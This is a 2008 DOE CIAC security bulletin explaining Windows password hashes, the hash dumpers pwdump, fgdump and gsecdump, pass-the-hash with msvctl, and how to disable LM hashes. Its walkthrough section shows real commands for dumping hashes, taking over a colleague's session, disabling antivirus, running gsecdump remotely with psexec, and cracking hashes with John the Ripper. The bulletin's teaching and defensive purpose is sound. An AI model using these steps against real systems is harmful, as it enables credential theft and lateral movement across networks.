-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 __________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ TECHNICAL BULLETIN Understanding Windows Hash Dumpers and Crackers May 21, 2008 23:00 GMT Number CIACTech08-002 ______________________________________________________________________________ PROBLEM: Windows Hash Dumper programs are both auditing and hacking tools. For auditing, they are used to detect poor passwords. As a hacking tool, they are also used for detecting poor passwords that can be broken and used for compromising systems or used directly to login to systems. PLATFORM: All Windows Platforms ABSTRACT: Windows hash dumping tools are often spotlighted as hacker tools that can somehow magically extract windows hashes and allow an intruder access to a system. In actuality, the hashes are there, in memory and on disk, where any admin or system level user can get at them. The tools just grab and print them out. This paper describes how Windows hashes are created, how the hash dumpers get at them, and what can be done with the hashes. ______________________________________________________________________________ LINKS: CIAC BULLETIN: http://www.ciac.org/ciac/techbull/CIACTech08-002.shtml OTHER LINKS: TrueSec: gsecdump: http://www.truesec.com/PublicStore/catalog/ Downloads,223.aspx pwdump: http://en.wikipedia.org/wiki/Pwdump Fgdump: http://foofus.net/fizzgig/fgdump/ TrueSec: msvctl: http://www.truesec.com/PublicStore/ catalog/Downloads,223.aspx Sysinternals: psexec: http://technet.microsoft.com/ en-us/sysinternals/bb795534.aspx Microsoft: Selecting Good Passwords: http://www.microsoft.com/technet/security/ smallbusiness/prodtech/WindowsXP/ select_sec_passwords.mspx John the Ripper: http://www.openwall.com/john/ Rainbow Tables: http://en.wikipedia.org/wiki/ Rainbow_table Disable LM Hash: http://support.microsoft.com/kb/299656 ______________________________________________________________________________ Windows hash dumping tools are often spotlighted as hacker tools that can somehow magically extract windows hashes and allow an intruder access to a system. In actuality, the hashes are there, in memory or on disk, where any admin or system level user can get at them. The tools just grab them and print them out. Windows Hashes ============== To understand windows hash dumping tools, you first have to understand Windows hashes. When you create a password for an account, the password is not stored in the system in clear text. It was very apparent early on that storing passwords on a system in clear text was not a good idea. Anyone who got access to the password file would have access to every account on the system. Trouble is, if you don’t have the password on a system you cannot use it to authenticate a user’s login. To get around this problem, system developers hashed the password with a one way hash and stored the hash on the system. When a person logs in, the password he types is hashed and the result compared to the stored hash. If they match, the user is allowed in. A one way hash is a function that converts an input text string to a unique output text string. However, it is one way because given the output sting, there is no function to give you back the input string. The only way to find the input string is to try all possible input strings until the output string matches the one you are searching for. For this reason, if an intruder were to steal the hash database, it could not be immediately used to break into a system because the passwords would have to be cracked first. Cracking involves trying every possible input string to find the one that generates the wanted output string. If the password is sufficiently long and complex, it can take an intruder a huge amount of time (millions of years for a sufficiently good password) to do the cracking. That is not to say that cracking programs have not found ways to shorten that process. The most common is to use a dictionary. Most human generated passwords use dictionary words and so hashing a dictionary as a first attempt to crack a password often gets results faster than trying a random list of characters. Newer cracking programs use what are called Rainbow Tables. In its simplest form, a Rainbow Table is a dictionary of hashes. You generate and store the table beforehand and then just lookup the hash in the table to find the password. It is actually a bit more complicated then that as you cannot store all possible hashes, but that is basically how it works. This method of attack became practical with the advent of large, inexpensive hard drives to hold the huge tables. One method for making Rainbow Tables difficult or impossible to use is to salt the hash. Salting involves adding some random characters (the salt) to the password before hashing it. Using a different salt with a password creates a different hash. You then save the salt with the hash so it can be used. There are now millions of variations for every password, one for every possible value of the salt, making it impossible to store sufficiently large Rainbow Tables to make the method work. While salt has been used in unix password hashes for many years, salt is not used in Windows hashes. Windows Hashes ============== Windows systems currently use one or more of four different authentication methods. LanManager (LM) NT Lan Manager (NTLM) NT Lan Manager 2 (NTLMv2) Kerberos Each of these methods uses different hashes of the password and different storage methods. LanManager (LM) hashes are the oldest and least secure of the Windows hashes. A password is first shifted to all upper case and then broken into two 7 character chunks. Each chunk is then hashed independently without salt and concatenated. The result is that an intruder need only crack two seven character hashes and need only consider upper case characters, numbers, and symbols to break the password. This is very easy to do using today’s technology. Another difficulty with LM as the security authenticator is that the hash is sent over the network in the clear when doing a network login to a system. This mechanism makes it possible to capture the hash by sniffing the network. The NT LanManager (NTLMv1) hash is created by taking the MD4 hash of the users password. This is a much stronger hash as the password is not changed to upper case, allows the use of the Unicode character set, and it is not broken into shorter, easier to crack chunks. To further increase security, logins with NTLMv1 are a challenge response mechanism so that the hash is never sent over the network. NT LanManager version 2 (NTLMv2) uses the NTLMv1 hash but with a much more secure challenge response mechanism to authenticate someone over the network. Kerberos is used by Microsoft Windows Active Directory based security. To be backward compatible with older Windows systems, most new systems come with all of these authentication mechanisms enabled. LM is enabled to allow connections with Windows for Workgroups, Windows 95, and Windows 98. If you are not sharing a network with these systems, you do not need it and it should be disabled. NTLMv1 is needed to share a network with Windows NT4 SP3 or earlier. Again, if yu are not sharing a network with this version of Windows, you do not need NTLM v1. NTLMv2 is need for connecting to Windows 2000 domains and Windows NT4 SP4 or later. Windows Local and Group Policy keys are available to control which of the LanMan versions a system will accept. Hash Dumpers ============ Probably the most well known of the hash dumpers is pwdump. There are currently seven versions of pwdump written by various people but all do essentially the same thing. They extract the LM and NTLM hashes from the SAM database. The SAM is that part of the registry that holds security information. They also try to dump the stored hashes from previous domain logins into the system and the hashes of the currently logged in users. To improve security, the SAM can be encrypted but most of the hash dumpers know how to decrypt it as the ability to decrypt it must be available for the system to use it. One thing to keep in mind is that you must be a privileged user to run the hash dumpers and extract any hashes. They do not magically get around the security system. That said, if you are logged into a workstation and have administrator access to that workstation and the domain administrator is also logged into that workstation, you can get the domain administrator’s hash using one of these hash dumpers. Pwdump ====== Pwdump is one of the oldest hash dumpers. It can dump the hashes in the local registry to a file that can be used with Windows cracking programs such as John the Ripper. Version 3 added the capability to dump hashes in remote systems. You must have admin access to the remote system to do this. It operates by pushing code onto the remote system using the ADMIN$ share. It then requests the Service Control Manager to install and run that code as a service. To extract the hashes, you must have privileged access to the Sam. As the Windows LSASS process runs with sufficient privileges, pwdump uses a process called DLL injection to inject its code into the LSASS code space and get it run. The code then extracts the password hashes and stores them in the registry. The attacking system can then connect to the registry remotely and download the hashes. Fgdump ====== Fgdump is the combination of several different hash dumping tools into one executable to make it easier to dump the hashes. It includes pwdump6, cachedump, and pstgdump. The following operational steps are from the fgdump readme. Bind to a remote machine using IPC$ (or a list of machines) Stop AV, if it is installed Locate file shares exposed on that machine Find a writable share from the above list, bind it to a local drive Upload fgexec (used for remote command execution) for cachedump Run pwdump Run cachedump Run pstgdump Unbind the remote file share Restart AV if it was running Unbind from IPC$ Pwdump6 dumps the hashes in the Sam registry file as described above. Cachedump dumps the cached domain credentials. When you do a domain login to Windows systems, the systems caches your credentials for situations where the domain controller is not available. This allows you to login to a system when the domain controller is down. Otherwise you could only login using local credentials. Pstgdump dumps the protected storage which includes things like saved IE and OutlookExpress passwords. Gsecdump ======== The newest kid on the block is gsecdump. Gsecdump is very similar in its capabilities to Fgdump but without the remote system capabilities. To run it on a remote system you must use Sysinternals (Now Microsoft) psexec program. Gsecdump dunps the Sam and the cach of domain credentials. In addition, it can dump the LSA, Wireless, and Active logon sessions. msvctl ====== Another new program related to the hash dumpers is msvctl. This program is essentially a login program that uses the hash instead of the password to login to a system. As all authentication is actually done with the hashes, this program dispenses with the password and directly uses the hashes to perform the logins. Disabling the LM Hash ===================== To disable the LM hash, you must make two changes using the registry or policy editors. The first disables the use of the LM hash in network logins. The second prevents the LM hash from being saved on disk in the SAM. These instructions are for Windows XP with the variations needed for Windows 2000 in parenthesis. Preventing the Use of the LM Hash in Network Logins - - --------------------------------------------------- In the control panel, open the Administrative Tools, Local Security Policy tool. Under Local Policies, select Security Options. In the Security Options List double click Network Security: Lan Manager authentication level (Lan Manager Authentication Level in Windows 2000). At this point, you will have a drop down list of local policy settings for what kinds of authentication to do for network logins. If possible, set this to, Send NTLMv2 response only/refuse LM & NTLM, which is the highest setting. If you must use a lower level setting, try to pick one that does not allow LM hashes. Preventing the Storing of LM Hashes - - ----------------------------------- The next step is to prevent the storing of LM hashes. Again, open the Local Security Policy tool and select Security Options. In the Security Options List, double click, Network security: Do not store LAN Manager hash value on next password change. In the dialog box that appears, select Enabled and click OK. You will then need to change all the passwords on the system. The new passwords will be stored in the SAM with the hash for a blank password for the LM hash and the real hash for the NTLM hash. This security option is not available in Windows 2000 so you will need to edit the registry directly. In Windows 2000, open regedit and edit the following registry key. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa add the key, NoLMHash to this key, and reboot your system. More information can be found in the following article. http://support.microsoft.com/kb/299656 Hash Dumpers in Use =================== To get a feel for how hash dumpers are used, this section wil go through all the steps necessary to dump the hashes and crack them. First run gsecdump -h to see the options. gsecdump [options] options: -h [ --help ] show help -a [ --dump_all ] dump all secrets -l [ --dump_lsa ] dump lsa secrets -w [ --dump_wireless ] dump mircosoft wireless connections -u [ --dump_usedhashes ] dump hashes from active logon sessions -s [ --dump_hashes ] dump hashes from SAM/AD Using -a, it will dump whatever it can find in a system. F:\Projects\gsecdump>gsecdump -a info: you must run as LocalSystem to dump LSA secrets Microsoft wireless secrets: No interfaces found CIAC\orvis::aa7060d41533f2daa361a6c342c88aea:6faccd47f6ba2685521aacb32fd788f2::: CIAC\jonathon::a46139feaaf2b9f1af13362357cec994:621e7e6212259c99338ea3733ef47abd ::: CIAC\BEATRICE$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392a d::: CIAC\BEATRICE$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392a d::: ASPNET(current):1003:aad3b435b51404eeaad3b435b51404ee:72f96de62387d4f07d0fc70067 a1b711::: administrator:1004:aad3b435b51404eeaad3b435b51404ee:a18d154b7ac68fab46c077f64d2c 6124::: Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0 89c0::: HelpAssistant(current):1000:8e8fa1208e3659556970e6173d54580:e9302c669523de51c557 a4c61c6b38d9::: SQLDebugger(current):1013:aad33235451404eeaad3b435b51404ee:c1f211f6d76d9755468b5 e7ef806fcc1::: SUPPORT_388945a0(current):1002:aad3b435b51404eeaad3b435b51404ee:5a69566824cd4d2b bec5441b00930be9::: VUSR_VAP2(current):1006:aad3b435b51404eeaad3b435b51404ee:5bd277e41258752719a45a0 82a83c952::: First, you see the hash of the logged in domain user ciac\orvis (me). Following that is the machine account logged into the domain ciac\beatrice and then the local accounts from the SAM. This system has LM hashes turned on so you see both the LM hash (between the second and third colon) and the NTLM hash (between the third and fourth hash). On some of the accounts the LM hash is disabled and is replaced with, aad3b435b51404eeaad3b435b51404ee which is the hash of a blank password. From this hash, you can see that the LM hash is actually two hashes concatenated together. For some accounts, you may also see all zeroes or NO PASSWORD********************* for the disabled LM hash. I see that Jonathon is logged into my system so I have his hash. I happen to know that his system is demonpc so I can use the msvctl program to login as him. First, run the msvctl command as jonathon and have it start a command shell. F:\>msvctl jonathon:1003:c222dae1d1379a51c22df6105198:7a306030abd444f34c2ab0181fde1033::: run cmd This opens a command shell on my system using Jonathon’s hash. If Jonathon has administrative privileges on a remote system, I can use the net commands to mount his drives or the psexec command to run gsecdump on the remote system to gather even more password hashes. First, try the net use command to see if I really have access to his system. F:>net use r: \\demonpc\c$ The command completed successfully. F:\>r: R:\>dir Volume in drive R has no label. Volume Serial Number is 04B4-5B64 Directory of R:\ 09/21/2007 09:19 AM 7626d22404b5d683932dfb2d4fbed7 04/15/2008 11:06 AM 0 AUTOEXEC.BAT 09/20/2007 12:46 PM 0 CONFIG.SYS 09/20/2007 01:05 PM dell 09/21/2007 10:51 AM Documents and Settings 04/09/2008 01:04 PM Entrust Profile 09/21/2007 01:47 PM Extras 10/11/2007 10:26 AM llnl 04/11/2008 12:04 PM Program Files 04/18/2008 02:53 PM sqldeveloper 04/15/2008 09:53 AM WINDOWS 09/20/2007 01:55 PM WUTemp 2 File(s) 0 bytes 10 Dir(s) 69,302,841,344 bytes free Yes, I am there; Jonathon you are 0wn3d. Here, you can see I have mounted demonpc’s C: drive as my R: drive and listed the contents. At this point, I can read or change any files that he can read or change on his system. If any system we run gscdump on has been visited recently by the domain admin, we can get the domain admin’s hash and use it to login to the domain controller or any system in the domain. Using pesc to run gsedump remotely from my connected command window, F:\>psexec \\demonpc -s -f -c ./gsecdump.exe -u PsExec v1.94 - Execute processes remotely Copyright (C) 2001-2008 Mark Russinovich Sysinternals - www.sysinternals.com PsExec could not start ./gsecdump.exe on demonpc: The system cannot find the file specified. It didn’t work because Jonathon's AV is killing gescdump as soon as pseexec drops it on his system. I walked over to Jonathon’s system, logged in locally as administrator and turned off his AV, went back to my system and tried dumping his hashes again, F:p>psexec \\demonpc -s -f -c ./gsecdump.exe -u PsExec v1.94 - Execute processes remotely Copyright (C) 2001-2008 Mark Russinovich Sysinternals - www.sysinternals.com CIAC\administrator::a7e78d4eae592d3f281667e9d738c5d9:78edf04f13a988fbc812b775893 0b292::: CIAC\DEMONPC$::00000000000000000000000000000000:1af8d2cb4d9b99794471013687c5da19 ::: CIAC\DEMONPC$::00000000000000000000000000000000:1af8d2cb4d9b99794471013687c5da19 ::: ./gsecdump.exe exited on demonpc with error code 0. This time it worked and you can see me as administrator logged into his system. This administrator’s hash could now be used to login to other systems including the domain server. Note: All hashes and user ids in this document have been changed to protect the innocent. Cracking Passwords ================== To test passwords by cracking to see if they are strong enough, take the hashes dumped by the hash dumpers and feed them to a program like John the Ripper. It will try several attacks on the passwords, including a dictionary attack and brute force to see if it can guess the password. Any password it can guess in a reasonable amount of time (a few days) should be considered totally insufficient and the owner should be pushed to change it to a stronger value. Not being able to crack a password in a few days with John the Ripper is not proof against cracking but will at least assure you that the password cannot be cracked easily. For example, the following hash for user bill has the password ripit. This hash is in the file passwords.txt. bill:1013:db48291b8f012289aad3b435b51404ee:fb5cc42be52d38c1dd4725210b04c438::: Cracking it with John the Ripper gives the following results. C:\John the Ripper\run>john-mmx passwords.txt Loaded 1 password hash (NT LM DES [64/64 BS MMX]) RIPIT (bill) guesses: 1 time: 0:00:00:15 (3) c/s: 719788 trying: RIPH5 - RIPLM Note from the results that it took only 15 seconds to crack that 5 character password. Results are also in the file john.pot. $LM$db48291b8f012289:RIPIT - - From this, you can see that it cracked the LanMan hash with the result all upper case even though the actual password was lower case. If there are no LM hashes, there is an addin to John the Ripper that will crack NTLM hashes. However, it will be extremely slow because it will have to crack the complete password at once rather than cracking it seven characters at a time. That is, assuming you have a password that is more than 7 characters long. Conclusion ========== Hash dumping programs such as pwdump or gsecdump do not magically capture Windows hashes but must have sufficient privilege to do so. Thus, you must have administrator or system rights to do so. However, if you normally run as administrator, you have the rights to see these hashes so it should not be surprising that you can do so. Hash dumpers are valid administrative tools that you can use to search for systems with the LM hash enabled or for accounts with poor passwords. On the other hand, intruders use these tools to gather password hashes for cracking and to use for system logins to expand their access. Again, reducing the use of administrative passwords on systems reduces the risk that the intruder can get anything useful. In addition, the fact that these tools trigger antivirus programs also reduces the risk that they can be used maliciously. Because it is so weak, you should disable the use and storing of LanMan hashes on a system as even a strong password can be cracked in a few minutes because of the way it is stored. - - - -------------------------------------------------------------------------------- - - -- CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at: Voice: +1 925-422-8193 (7x24) FAX: +1 925-423-8002 STU-III: +1 925-423-2604 E-mail: ciac@ciac.org Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive. World Wide Web: http://www.ciac.org/ Anonymous FTP: ftp.ciac.org PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization. A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/. This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC) S-213: Nukedit 'email' Parameter Vulnerability S-214: SurgeMail and WebMail 'Page' Command Vulnerability S-215: Symantec Backup Exec Scheduler ActiveX Control Multiple Vulnerabilities S-216: Juniper Networks Secure Access 2000 'rdremediate.cgi' Vulnerability S-217: Drupal Multiple HTML Vulnerabilities S-218: gd Security Update S-219: Juniper Networks Secure Access 2000 Web Root Path Vulnerability S-220: PHP-Nuke My_eGallery Module 'gid' Parameter Vulnerability S-221: Learn2 STRunner ActiveX Control Vulnerabilities S-222: Evolution Security Update -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBSDSqikrr52ee8YsTEQKB9QCdGTOH7Wdi8bGUP6nWnE1hcCswJXAAoPao ndTeJUyJEF3sz5AVJln+D3W6 =a8aS -----END PGP SIGNATURE-----